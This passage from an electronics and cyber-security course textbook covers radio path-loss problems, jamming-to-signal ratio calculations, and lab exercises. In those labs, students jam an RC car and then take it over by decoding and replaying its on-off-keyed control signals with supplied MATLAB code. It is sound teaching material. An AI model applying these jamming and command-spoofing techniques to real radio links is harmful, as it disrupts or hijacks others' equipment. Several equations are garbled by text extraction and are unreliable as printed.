Now use the Friis Free Space equation to calculate the the received power at 1m:
Pt Gt Gr l 2 500 mW×1.585 × 6.310 × ( 0.428 m )
=
= 5.8 mW,
( 4p d ) 2
( 4p ×1 m )2
2
Pr (at 1 m) =
or in dBm,
æ 5.8 mW ö
10 log10 ç
= 7.6 dBm
è 1 mW ÷ø

Compute the path loss at the reference distance:
PLdB (d0 = 1 m) = Pt (dBm) - Pr(dBm, 1 m) = 27 dBm - 7.6 dBm = 19.4 dB

Compute the path loss at distance d = 1000 m:
ædö
æ 1000 m ö
PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷ = 19.4 dB +10 × 3.1× log 10 ç
= 112.4 dB
è 1 m ÷ø
d
è 0ø

Finally, determine received power at the cell tower:
PLdB (d0 = 1000 m) = Pt (dBm) - Pr(dBm, 1000 m) so
Pr(dBm, 1000 m ) = Pt (dBm ) - PLdB (d0 = 1000 m)
= 27 dBm -112.4 dB
= - 85.4 dBm
Note that this is actually weaker (by 15 dB, or a factor of 30) than the received power at a distance of 5 miles (8 km) that was
predicted by the Friis Free Space equation for a similar scenario in the previous Practice Problem. This illustrates the
inaccuracy of using the Friis equation in scenarios that are not free-space.
Incidentally, a received signal power of −85.4 dBm is still sufficient to “close the link” and communicate with the tower
(recall that −105 dBm is the minimum power to “close the link”).
545
546
Problems
1. Is diffraction harmful or advantageous in radio communications? Explain.
2. What are the three modes that an electromagnetic wave can travel from a source to a destination?
3. What is the term used for an electromagnetic wave that propagates by line-of-sight?
4. A ship-to-ship marine-band VHF radio operates at 156 MHz and is limited to a maximum of 25 watts. The signal
propagates via space propagation, so it is limited in range to direct line-of-sight. A Coast Guard transmitting station on shore
has a monopole antenna that is 350 feet tall.
(a) If a ship is 35 miles (56,315 m) away from the CG station, how high must the ship’s monopole antenna be mounted
to ensure reception?
(b) Using the Friis Free-Space equation, calculate the received power at the ship.
(c) If someone is standing in a life raft with a hand-held VHF radio (assume antenna height of 6’), what is the maximum
range from which they could contact the ship in part a?
5. In a certain communication link, the transmit power is 5 W and the path loss is 100 dB. What is the received power in
mW?
6. Use the log-normal model to solve for the distance of transmission (d) given the following parameters. Use the Friis FreeSpace equation to determine the path loss at d0 = 1 m.
n = 2.7, f = 900 MHz, Pt = 10 dBm, Pr = −70 dBm, Gt = 1.64, Gr = 5 dB.
547
548
Security Exercise 25
Drivers start your engines.
Today we looked at various ways radio waves propagated through space, air. For this lab, we will be using radio control
(RC) cars, our communication system, to evaluate the propagation of electromagnetic waves as they traverse through space.
Now we have gone out of the way to purchase the best radio control cars in the world. That’s right! Only the best for you
guys. We acquired Ferraris, Audi R8, Lamborghinis, Camaros, etc. Don’t they look so pretty?
The cars that you have available to you today operate at a couple of different frequencies.
Question 1: Examine the cars and write down the frequencies at which the cars operate on your answer sheet.
Question 2: Based on the frequencies you just determined for the cars in you classroom and what you learned in class,
which propagation mode is used to control these cars? (i.e. ground wave, sky wave, space wave)
Question 3: Why won’t the other two propagation modes work?
Question 4: What are the wavelengths of the frequencies associated with the RC cars? Show your work and record your
wavelengths on the answer sheet.
Now that you know the wavelengths associated with the frequencies, how far do you expect the cars to travel? You need
some information to calculate the distance. The gain for the transmitting antenna is -8 dB. The gain for the receiver antenna is
also -8 dB. The power of the transmitter (PT) is 10 dBm. The minimum power necessary at the receiver (PR) to control the car
is -50 dBm. Rearrange and use the Friis Free Space equation to determine the distances for both the high- and low-frequency
car.
Question 5: Show your work and record your expected distances on the answer sheet.
Alright. You have your calculation. Now, it’s time to take measurements and see how accurate they are. Measure how far the
lower frequency car will go. Make sure your measurement is in meters. Drive from the front of the classroom to the back
and around back benches, not out of the classroom. Remember the distance be should a straight line to the car, not the path is
takes. So how far did it travel?
Question 6: Record the experimental distance for the lower frequency car on the answer sheet.
You should’ve noticed that the car didn’t go nearly as far as you calculated. Why?
Think back to the equation you used to calculate the distance. What did we say about the equation? It needs to be used in free
space without obstructions. That means no terrain, mountains, buildings, ground, or atmosphere. In the classroom, there are
desks, lab equipment, people—all obstacles. So the Friis Free Space equation isn’t going to provide an accurate distance.
When we have all this furniture and equipment that can interfere with the signal, they will reflect the signal, diffract the
signal, and/or scatter the signal. Remember that:
(1) Reflection occurs when energy (or the signal) reflects off a large (relative to the λ) conductive surface.
(2) Diffraction occurs when energy bends around objects.
(3) Scattering occurs when EM waves strike a rough surface (smaller than λ) and re-radiates the EM wave in many
different directions.
As the signal is affected by all the lab equipment, people, etc., the signal at the receiver is a combination of many variations
of the original signal. This variation leads to a reduced signal strength. So how are you going to determine how far the higher
frequency car should go?
549
Let’s use the Log-Normal model. This model is widely used to not only predict coverage for a particular mobile user (i.e. the
RC car), but also for predicting the interfering signal power that the mobile user will experience from other Radio Frequency
sources (i.e. the cell phones in your pocket). The log-normal equation is:
ædö
PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷ .
è d0 ø
To predict the distance of the high frequency car, you need a few pieces of information. Inside a building with obstructions
(i.e. your classroom), you would expect a path loss exponent of 4-6. For your classroom, use 4 as the path loss exponent (n =
4). At the max distance, you would expect a Pr of −50 dBm, and your Pt is 10 dBm (use the difference in Pt and Pr to
determine PLdB(d)). The last piece of information you need to make your calculation work is: at d0 = 1 meter, the path loss is
10 dB (that is, PLdB(d0) = 10 dB). Use the path-loss equation above to compute the distance d, given these parameters.
Question 7: Show your work and record the new expected distance (d) for your higher frequency car on the answer sheet.
Question 8: Now go drive the higher frequency car. Drive from the front of the classroom to the back and around back
benches, not out of the classroom. How far did it go in meters? Remember the distance should be a straight line to the car,
not the path is takes.
You did it. So now you can calculate, at least for a RC car, the distance a radio wave will travel. But be aware that if you
change the configuration, (i.e. you go into the hall) you will have different model parameters and therefore different results.
One last test of you mathematical skills. Calculate the distance the lower frequency car will travel if you were outside. In this
case, use a path loss exponent (n) of 2.6. All other parameters are the same.
Question 9: What is the expected distance (d) for your lower frequency car? Record on the answer sheet.
Watch the Youtube video, RC Car Outside Distance.
Question 10: Were you correct (roughly)? ____________________________
Your final test. Using either car, place the car against the wall inside the classroom next to the door. Go outside the door
where you can no longer see the car. Just on the other side of the wall should be fine. Try to move the car using the radio
controller.
Question 11: Did it move? Why or why not? (hint: Think back to the 3 interferences on page 3.)
550
EC310 Security Exercise 25
Name:
__________________________________________________________________________________________
Question 1:
Low frequency =
_____________
High frequency = _____________
__________________________________________________________________________________________
Question 2:
__________________________________________________________________________________________
Question 3:
__________________________________________________________________________________________
Question 4:
Wavelength (low frequency car) = _____________
Wavelength (high frequency car) = _____________
__________________________________________________________________________________________
Question 5:
Distance (low frequency car) = _____________
Distance (high frequency car) = _____________
__________________________________________________________________________________________
Question 6:
Experimental distance for low frequency car =
_______________________________________________________________________________________
Question 7:
__________________________________________________________________________________________
Question 8:
__________________________________________________________________________________________
Question 9:
__________________________________________________________________________________________
Question 10:
__________________________________________________________________________________________
Question 11:
__________________________________________________________________________________________
551
552
Chapter 26: Electronic Warfare
Objectives:
(f) Define Electronic Warfare and provide an example of each of the three Electronic Warfare categories: Electronic Defense,
Electronic Warfare Support and Electronic Attack.
(g) Define Jamming to Signal ratio (J/S) and calculate the necessary power to jam an emitter.
Connection to Cyber Security
Warfare involves offensive and defensive operations.
In the Host Module, we learned that an adversary can attack our host computer by employing a buffer overflow exploit. To
counter this attack, we have several defensive actions at our disposal; for example, we can avoid the C library functions that
are notorious for inviting buffer overflows, we can use a non-executable stack, a canary can be used to detect an attempt to
overwrite a stored return address, etc. Recall also that, aside from formal attack operations and defensive responses, an
adversary might attempt to look for flaws in our host software. For example, an adversary might enter a ridiculously long
value when prompted to enter something, as a test to see if he can make the program behave erratically.
In the Network Module, we learned that an adversary can attack our network using either a false route injection attack or a
wide-area BGP route-hijacking attack. To defend against false route injection, we can use an OSPF authentication
mechanism, or we might selectively set up passive interfaces on router ports. To defend against a wide-area BGP routehijacking attack, we can use judicious filtering at Autonomous System borders, or we might attempt to authenticate routing
information against an Internet Routing Registry, or we can attempt to receive some cryptographic assurance of the routing
information we receive by using the Resource Public Key Infrastructure. Recall also that, aside from formal attack operations
and defensive responses, an adversary might attempt to perform "network reconnaissance" by using Wireshark, nmap or
various network utilities.
Not surprisingly, we find in the Wireless Module that the electromagnetic spectrum can also be used for offensive and
defensive operations, as well as for "reconnaissance" operations. In the context of wireless systems, these attack, defensive
and reconnaissance operations are termed electronic warfare. The jamming and taking over of communication links are two
of the ways that cyber attackers exploit wireless communications.
Electronic Warfare (EW)
The term Electronic Warfare (EW) refers to any action involving the use of electromagnetic energy to attack an adversary or
to otherwise control the electromagnetic spectrum. EW includes three major subdivisions: electronic attack, electronic
defense, and electronic warfare support. We'll discuss each of these in turn, starting with electronic warfare support.
A. Electronic Warfare Support
Electronic warfare support refers to those actions that are taken to search for, intercept, identify, and locate sources of
radiated electromagnetic energy for the purpose of target identification, or for the planning and conduct of future operations.
Phrased another way, electronic warfare support entails gathering knowledge about the enemy through the use of the
electromagnetic spectrum.
We discussed an example of electronic warfare support in Security Exercise 23. Recall that in that lab you wandered the
hallways of the Rickover lab deck in search of a wireless access point. This was, at heart, an electronic warfare support
operation—you were attempting to locate a radio emitter of interest. In the lab, your only goal upon locating the emitter was
to note the funny message placed next to it. In a more realistic scenario, the data gathered from an emitter could produce
intelligence concerning the user (friend or foe?) and their location.
Suppose you can pick up an adversary’s radio transmission. How could you determine the direction it is coming from? If you
used a directional antenna like a Yagi you could determine a compass bearing in the direction of the emitter. If you get a
compass bearing from three locations you could plot the bearings on a map and get a fix. This was actually one of the early
means for ships to fix their position by electronic means, via the Omega or Loran C navigation systems, which were
operational until shut down in favor of GPS.
553
B. Electronic Defense
Electronic defense includes those actions taken to protect personnel, facilities, and equipment from an adversary's use of the
electromagnetic spectrum to attack us. It should be noted that in DoD literature (if one may use the word literature to
describe stultifying, committee-drafted, jargon-laden, gobbledygook), the term "electronic defense" is often termed
"electronic protection", since in defending ourselves, we are protecting ourselves. (A few years ago, the in-vogue term for
electronic defense was electronic counter countermeasures –ECCM. Before that, the preferred term was electronic
protective measures.)
We discussed an example of electronic defense in Security Exercise 23. Sure enough, you were simply wandering the
hallways in search of a wireless access point. But in an analogous fashion, an adversary can home in on the transmissions of a
ship, a submarine, an aircraft, or forces in the field. To prevent an adversary from using the electromagnetic spectrum to
locate our transmitter, we will often limit radio communications to the minimum necessary. Thus, emissions control is a form
of electronic defense.
Another form of electronic defense is the use of stealth technologies (shapes with low radar cross-sections, non-metallic
materials, radar-absorbent coatings) to protect aircraft and ships from radar detection.
The definition of electronic defense is broadened to also include not only the actions we take to defend ourselves, but also the
actions that we take to protect our own ability to attack the enemy. This can lead to some confusion. For example, if we
launch an infrared homing missile against an enemy, we are engaging in electronic attack. If our enemy sees the incoming
missile and launches flares in an attempt to divert it, he is engaged in electronic defense and electronic attack. But if we
counter his flares by using flare-rejection technology on our infrared homing missile, we are also engaged in electronic
defense, since the flare-rejection technology protects our ability to attack! Think of the great exam questions!
C. Electronic Attack
Electronic attack involves the use of electromagnetic energy to attack personnel, facilities, or equipment with the intent of
degrading, neutralizing, or destroying an enemy's combat capability. The preeminent example of electronic attack is
jamming.
Jamming
Jamming is the transmission of an electromagnetic signal that disrupts an adversary's communications.
554
Consider the picture below. An enemy transmitter is sending information to an enemy receiver at a certain frequency, say f.
The enemy transmitter and receiver are separated by a distance dS. Meanwhile, our hero is a distance dJ away from the enemy
receiver.
Our hero's goal is to transmit another signal—a jamming signal—at the same frequency—f—that the bad guys are using. The
jamming signal will target the bad guy's receiver. So, the intent is to have two signals arrive at the bad guy's receiver: the
signal sent by the bad transmitter, and the midshipman's jamming signal. The midshipman's goal is to have his jamming
signal be of sufficient power to override the signal from the bad transmitter, thus preventing the bad guys from
communicating.
It is important to note that what we are jamming is the receiver, not the transmitter. As an analogy, imagine trying to yell
something to someone across Worden Field. If a third person comes along and wants to prevent you from communicating,
what would be more effective: to yell in the ear of the person trying to relay a message or to yell in the ear of the person
trying to hear the message? The latter would be more effective.
I know what you are saying: Where's the math?
For the jammer, the object is that the received jamming power at the Bad Guy receiver be greater than the received signal
power from the Bad Guy transmitter. Using the Friis equation, the received jamming power (PJ) in terms of the jammer’s
EIRP is (rearranging the equation a little):
PJ =
EIRPJ ×Gr × l 2
( 4p d J )2
=
EIRPJ Gr l 2 æ EIRPJ ö æ Gr l 2 ö
=
.
( 4p )2 × dJ2 çè dJ2 ÷ø çè 16p 2 ÷ø
Similarly, the received signal power from the Bad Guy transmitter is:
æ EIRPS ö æ Gr l 2 ö
PS == ç
.
è dS2 ÷ø çè 16p 2 ÷ø
If we divide the received jamming power by the received signal power, we create the jamming-to-signal ratio (J/S), a term
similar to a signal-to-noise ratio:
æ EIRPJ ö æ Gr l 2 ö
çè d 2 ÷ø çè 16p 2 ÷ø
J
æ EIRPJ ö
çè d 2 ÷ø æ EIRP ö æ d 2 ö
J PJ
J
J
S
= =
=
=
.
S PS æ EIRPS ö æ Gr l 2 ö æ EIRPS ö çè EIRPS ÷ø çè d J2 ÷ø
çè d 2 ÷ø çè 16p 2 ÷ø çè dS2 ÷ø
S
555
Note that the wavelenths cancel since in order for our jamming to be effective, our jamming signal must be the same
frequency as the transmitted signal. This equation is usually used in terms of decibels, so for power in watts,
æ Jö
çè S ÷ø = EIRPJ ( dBW ) - EIRPS ( dBW ) + 20log10 ( dS ) - 20log10 ( d J ) ,
dB
and for power in milliwatts,
æ Jö
çè S ÷ø = EIRPJ ( dBm) - EIRPS ( dBm) + 20log10 ( dS ) - 20log10 ( d J ) .
dB
A J/S ratio greater than one (or a positive dB value) will mean the received jamming signal is stronger than the received Bad
Guy transmitter signal. Note that in these J/S equations, the distances to the jammer and to the signal must be in the same
units (e.g., meters).
Finally, an important assumption this equation makes is that the receiver has an omnidirectional beam pattern. This means the
receiver will accept transmissions equally from all directions. If this were not so, then the equation above would need to take
the receiver’s beam pattern into account.
Practice Problem 26.1
You are located 5500 meters from the omnidirectional receiver you are jamming. The transmitted signal that you are
jamming originates 9500 meters from the receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter
and jammer have line of sight, what EIRPdBW must you transmit to jam the receiver with a J/S of 5 dB? How many watts is
this?
Solution:
Practice Problem 26.2
You can transmit an EIRP of 25 Watts with your jammer. The transmitted signal you are jamming originates 8500 meters
from the omnidirectional target receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and
jammer have line of sight, how close must your jammer be to the target receiver to achieve a (J/S) dB of 3 dB?
Solution:
556
Practice Problem 26.3
Is there a possibility that our jamming scheme would not work if the Bad Guy Receiver was not omnidirectional? Explain.
Solution:
557
558
Security Exercise 26
Basics of Electronic Warfare
We devoted an entire third of this course to learning about wireless communications systems and the associated
considerations, from modulation to gain to antennas and signal propagation. Why? Because “Cyber” doesn’t exist solely in a
single computer or a closed network. You can have a significant impact by using Electronic Warfare as an enabler for Cyber
attacks. See: http://breakingdefense.com/2013/04/adm-greenert-wireless-cyber-em-spectrum-changing-navy/
Now we’re going to put all that knowledge to the test and apply your cyber skills in a wireless environment.
Set-up.
Equipment required:
□
□
□
□
□
□
□
□
Your issued Laptop
MATLAB Code RCcode.m and getkey.m
o Located in the EC310 Spring 2014 folder on your Desktop (EC310
Spring 2014\Wireless\Lab 27 Files)
LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope
Anritsu MS2711D Spectrum Analyzer
Telescoping Antenna w/ BNC connector
RC Vehicle
Signal Generator & accessories (Instructor will set up)
TURN OFF YOUR CELL PHONE! (The next hour of your life will be easier if your cell phone isn’t adding noise
to the Electromagnetic Spectrum.)
Part I: Data Collection
Communications System. For this Security Exercise, we’ll explore the entire communications system employed by a Radio
Control (RC) vehicle… And then we’ll exploit it!
Answer the questions that follow to examine the RC vehicle’s communications.
559
Note: These images resemble the models in your classroom enough to give you the general idea. We can’t all have Ferraris,
after all!
Question 1: Which image above (left or right) most closely represents the transmitter?
Question 2: Where is the receiver located?
Question 3: What type of channel does this communications system involve?
Question 4: What do you expect your “information” to be in this case?
Question 5: What will happen when the “information” is recovered at the receiver?
Question 6: What type of antenna does the transmitter use?
Question 7: What would you expect the beam pattern of this antenna to look like?
Question 8: Do the transmitter or receiver give any indication of carrier frequency? If so, what is fc?
To verify the carrier frequency of the transmitted signal, use the Anritsu MS2711D Spectrum Analyzer.
□
□
□
□
□
□
Press “Recall Setup” (Hard Key #6)
Ensure “Default” is highlighted
Press “Enter”
Set “Center” to the carrier frequency
determined in the previous question.
Set “Span” to 200 kHz
Transmit from RC vehicle controller
(ensure power is on); signal will display
on the spectrum analyzer
Question 9: What is the carrier frequency? Draw the signal in the frequency domain.
Part II: Jamming
Now that we have some basic intel, what could happen if your instructor was to transmit a signal at the carrier frequency?
The answer: It depends!
In lecture, we learned that the effectiveness of electronic attack/jamming is dependent upon the jamming-to-signal Ratio
(J/S). The J/S is dependent upon both the power received by the car from the jammer and the transmitter as well as the
distance of the jammer and the transmitter from the receiver. In this security exercise, our scenario looks like this:
560
The J/S depends on the received signal power at the car and the received jamming power at the car:
æ PJ ö
æ Jö
çè ÷ø = ç ÷ = PJ (dBm) - PS(dBm)
S dB è PS ø dB
Generally, if the J/S ratio is greater than 1 (or 0 dB), jamming will be effective.
□
Play time! Drive your vehicle around the classroom.
Question 10: What two conditions (with regards to frequency and received power) must exist for jamming to be
effective? Get your instructor’s signature to continue.
□
Your instructor will generate a 20 dBm frequency modulation (FM) signal at the carrier frequency.
Question 11: What is your instructor’s target?
□
While your instructor is transmitting the jamming signal, experiment! Attempt to control the RC car with its
transmitter at different distances from both the jammer and the RC car.
Question 12: When your instructor transmitted a jamming signal, were you still able to control the RC car? When
could you control it? When couldn’t you?
Question 13: Use the Anritsu MS2711D Spectrum Analyzer to draw the jamming signal in the frequency spectrum.
How does this change if you transmit while standing next to the Spectrum Analyzer?
Question 14: How could you increase the range of the jammer? (How is jamming range dependent on signal
power?)
561
Part III: Reverse Engineering
So now we know the carrier frequency and the effects of transmitting a higher signal power on that frequency, but if we want
to make a bigger impact, we need to know more about the RC car’s signal. What does the transmitted signal look like? What
type of modulation does it use? How do controls work? To accomplish this, we’re going to look at the signal using the
LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope.
First, some initial set-up for the O-Scope (see the figure that follows for button location):
□
Touch the yellow box on lower left corner of touch screen to configure Channel 1 with the following settings:
o Set Volts/div to 20 mV
o Set Coupling to DC50
o Set “Trigger” to 25.0 mV
o Touch “Timebase” to set Time/Division to 5.00 ms/div
o Press “Close” (top right corner for Channel 1 menu)
562
Once you’ve set up your Channel configuration on the O-Scope, it’s time to capture the
signal.
□
□
□
On “Trigger” section of O-Scope display, select “Normal”
Holding RC car transmitter close to the O-Scope, send the “forward” signal by
driving the car forward. Ensure antenna is extended!
When your signal is displayed on the screen, press “Stop” on Trigger menu,
while still sending the “forward” signal.
If done correctly, your O-scope display should look similar* to this:
* Captured signal may vary – that’s ok for now!
Question 15: What type of digital modulation does this car use?
Question 16: What pattern of 0s and 1s does the transmitted signal represent?
To be able to control the RC car, we want to be able to do more than just drive it forward. How does the signal change for
reverse, left, or right?
Think about the controls – how many different signals do you expect to control the car? In addition to driving forward, the
car can operate in reverse, as well as turning left and right… and any combination thereof! There are actually 8 different
combinations of signals, but in the interest of time we’re only going to worry about four: Forward, Reverse, Forward &
Right, and Forward & Left. Here’s the catch: the chips that process the signal and control the vehicles motion aren’t
necessarily wired the same way in every car, so you need to identify which control operation each transmitted signal
represents!
Examine each transmitted signal by repeating the process you just followed to capture the signal:
□
□
□
On the “Trigger” section of O-Scope display, select “Normal”.
Transmit desired signal.
o Forward
o Reverse
o Forward AND Right (This is different from the signal to pivot the wheels to the right only!).
o Forward AND Left (This is different from the signal to pivot the wheels to the left only!).
When your signal is displayed on the screen, press “Stop” on Trigger menu.
Question 17: Match the transmitted signals (shown on the following page) with the operations they represent
by circling the correct response. The signals can be distinguished by the number of 1s being transmitted after
the 4 large sync pulses.
563
Forward or Reverse or Forward-Right or Forward-Left??
( # of 1’s: 10)
Forward or Reverse or Forward-Right or Forward-Left??
( # of 1’s: 40)
Forward or Reverse or Forward-Right or Forward-Left??
( # of 1’s: 34)
Forward or Reverse or Forward-Right or Forward-Left??
( # of 1’s: 28)
Question 18: Now that you’ve identified the modulated signal that controls the car, could you determine the baseband
binary signal (voltage pulses) that are used for each control function? The block diagram for an OOK signal’s
generation is shown below.
We now know the bits that are transmitted to control the forward, turning, and reverse motions of the RC car. We also know
that we can’t transmit the baseband binary signal, so we need to modulate it on a high frequency carrier. If we could
reproduce these control signals and transmit by some other means than the car’s remote, do we need the remote to drive the
RC car? Let’s find out!
Part IV: The Hook
In this section, you’ll use the MATLAB code provided and your laptop soundcard to generate and transmit control signals to
the RC car. You may have noticed that each transmitted signal consists of 4 wide “sync” pulses followed by a trail of 0’s and
1’s. Since you’ve already matched the waveform to the driving direction, now all you need to do is determine the number of
1’s in the trail following the sync pulses. For example, in the image below represents
564
01110111011101110101010101010101010101110 in binary (check back to HW23 if you’re not a believer yet –
you knew this way back when!). For this sequence of bits, it is organized as follows.
On the oscilloscope, the control signal will be displayed as seen in the next figure.
Question 19: Fill in the table by entering the number of 1’s trailing the sync pulses for each RC car operation
determined in Question 18. You must find the exact value!
Direction
Number of
1’s in trail
Forward
Reverse
Right
N/A
Left
N/A
Fwd-Right
Fwd-Left
Rev-Right
Rev-Left
N/A
N/A
The MATLAB code takes input from the arrow keys on your laptop, generates the baseband binary signals to control the RC
vehicle, then modulates the signal with OOK. Since we only determined the binary waveform for 4 of the 8 possible
operations, we’ll be slightly limited in the operation of our RC vehicle – we won’t be able to turn while operating in reverse.
□
In MATLAB, update the “Setup Major Variables” section of your RCcode.m code (shown below) with the number
of 1s in the “trail” in preparation of taking over the RC vehicle.
%%%%%%%%%%%%%%%%
% RC CAR CODE %
%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
% PRESS SPACE TO TERMINATE EXECUTION
%
%
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% !!!!! NOTE !!!!!
% If you do something wrong and Matlab terminates unexpectedly (you get
a
% lot of angry red Error messages) you will have to close out and
restart
% Matlab in order to clear out the sound card buffer!!!
%
% Forward = Up Arrow
% Reverse = Down Arrow
% Forward Right = Right Arrow
% Forward Left = Left Arrow
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%
565
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Clear out memory and initialize default settings
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
clear all
close all
set(0, 'DefaultAxesFontSize', 14)
set(0, 'DefaultAxesFontWeight','Bold')
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Change
This
Section!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Setup major variables
%
% CHANGE THIS SECTION ONLY!!! (FOLLOW LAB INSTRUCTIONS) %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
forward_1s = 01;
reverse_1s = 01;
Insert Number of 1’s from Question 20 table here!
right_fwd_1s = 01;
left_fwd_1s = 01;
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
sam_per_sym = 22; %fs/Rb = 44.1e3/(1/Tb), Tb ~ 500us
fs = 44.1e3;
% Set sampling rate to sound card rate
Rb = fs./sam_per_sym;
fif = 10e3;
% 10.0 kHz "baseband" (IF) Frequency
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Generate the original data to manipulate the car
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
sync = [1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0];
forward = [sync repmat([1 0], 1, forward_1s)];
reverse = [sync repmat([1 0], 1, reverse_1s)];
right_fwd = [sync repmat([1 0], 1, right_fwd_1s)];
left_fwd = [sync repmat([1 0], 1, left_fwd_1s)];
pause = zeros(1,500);
key = 0; % Initial Keyboard Value
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Reads inputs once per second
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
while key ~= 32 %Press space to stop
key = getkey(1);
if key == 30
data = [forward forward forward forward forward forward forward
forward];
elseif key == 31
data = [reverse reverse reverse reverse reverse reverse reverse
reverse];
elseif key == 29
data = [right_fwd right_fwd right_fwd right_fwd right_fwd
right_fwd right_fwd right_fwd];
elseif key == 28
data = [left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd
left_fwd left_fwd];
else
data = [pause];
end
% Generate Polar NRZ
566
time_stop = length(data).*sam_per_sym;
up_data = zeros(1,time_stop);
time = linspace(0,(1/fs).*time_stop, length(up_data));
% Upsample
for i = 0:length(data)-1
up_data(sam_per_sym.*i + 1 : sam_per_sym.*i + sam_per_sym) =
data(i+1);
end
% Generate the "baseband" (IF) waveform
s_lo = cos(2.*pi.*fif.*time);
s_if = s_lo.*up_data;
soundsc(s_if,fs)
end
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
□
□
□
When your code is updated, run it by pressing (the run
button). Follow the next instruction carefully!
Double click your cursor in the MATLAB Command Window. If all went as planned you should see a window
opening and closing rapidly.
Press and hold your arrow keys to simulate driving your vehicle.
Question 20: What do you hear? What type of signal is being generated?
Question 21: What do you need to do to transmit this baseband binary signal so that the car receives it? Get your
instructor’s signature to continue.
567
Your instructor will use the same signal generator that transmitted the jamming signal in Part II to transmit the modulated
ASK signal. The set up looks like this:
□
Bring your laptop to your instructor and get ready to drive!
Question 22: Do you need the car’s transmitter to control the car? What just happened? What is now controlling the
car?
Question 23: List some examples of how this might be significant in a military setting.
Need ideas? Check this out! http://www.engr.utexas.edu/features/humphreysspoofing.
568
Appendices
569
570
Basic Linux Commands
I. Basic Linux Commands
The information below presumes you are familiar with the Linux file system and that you understand how
to refer to files and directories using absolute and relative pathnames. You should also be familiar with
the commands cd (change directory) and ls (list). This prerequisite information is available in the
handout named The Linux File System available as a link under the Resources tab on the EC310 course
website.
We will now address some basic file and directory operations.
To copy a file from one location to another, we use the cp command. For example, in the file system
below
if dane was in his home directory, and wanted to give bob a copy of the file named homework4, placing
it directly in bob’s home directory, he would type
cp
Cyber/homework4
the item to be copied
../bob
where the copy is to be placed
To create a file from scratch, you can open the file using nano, as you’ve done for all the programs
you’ve entered in EC310.
To move a file, we use the command mv command. In the file system shown above, if user dane wanted
to move the file named spoofing to place it under the Cyber directory, he would enter
mv
spoofing
Cyber
571
To view a file, we use the command cat followed by the filename (if it is right in your working directory)
or cat followed by the absolute or relative pathnames (if the file is not right in your working directory).
To remove a file, use the command rm followed by the file name (or pathname as applicable).
We can, in like manner, create a new directory using mkdir followed by the directory name (if we want
to place the directory right under the working directory) or mkdir followed by the pathname where we
want to place the new directory.
Finally, we can delete directories by using the command rmdir followed by the directory name or
pathname as appropriate. Note that you can only remove an empty directory, so to delete a directory you
must first delete all of its contents.
You should realize that we have only scratched the surface of using the Linux bash shell. You should not
place "Linux System Programmer" on your resume. But what you have learned, along with your use of
the gcc compiler, the gdb debugger and permission management (covered in Lessons 8 and 9) is more
than enough for EC310.
572
The Linux File System
I. The Linux File System
1. Introduction All users of a Linux OS have an account name (also referred to as a user name or a
login name) and a password. When your Linux account is created, you are also given a home directory
where all of your files and folders will reside. Your home directory has the same name as your account
name.
You may be wondering: Hey, I’m using Linux in EC310 and I was never asked for an account name and
password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware
software to provide Linux “already open” for you. We have, however, changed your account name to
midshipman since that is, after all, your first name.
You have been entering commands using the bash shell as your command line interface. Every time you
have entered a command such as
gcc –g smith_2_1.c
or
nano smith_2_1.c
you have entered that command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is
the dollar sign. Before the prompt, you will see your account name and your computer's name.
Your account name
Your computer's name
The prompt
There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The
tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home
directory.
If you wander up to a computer and notice that someone is logged on, and you see
then the user whose account name is joe has logged in but has forgotten to log out. Shame on him. Too
bad.
If you ever forget who you are, even though your account name is staring you in the face, you can enter:
whoami
as shown below:
In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories
(in Windows terminology, these are referred to as folders), which hold files (or other directories).
573
A Linux system (like a Windows system) may support multiple users. In such cases, each user is given
his own home directory. When you logon, you are automatically placed in your home directory. When
Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location
for any directories or files that you create. You can leave your home directory and move to other
directories. Whatever directory you find yourself in, that directory is termed your working directory.
A typical Linux file system (also called a directory structure) might look like this:
At the very top is the root directory, denoted /. The root directory contains all directories and files.
2. Absolute Pathnames Every file can be referenced by its absolute pathname, which starts at the root
directory and traipses down the inverted tree structure, with each entry also separated by a forward slash.
For example, the absolute pathname for the directory joe is
/home/joe
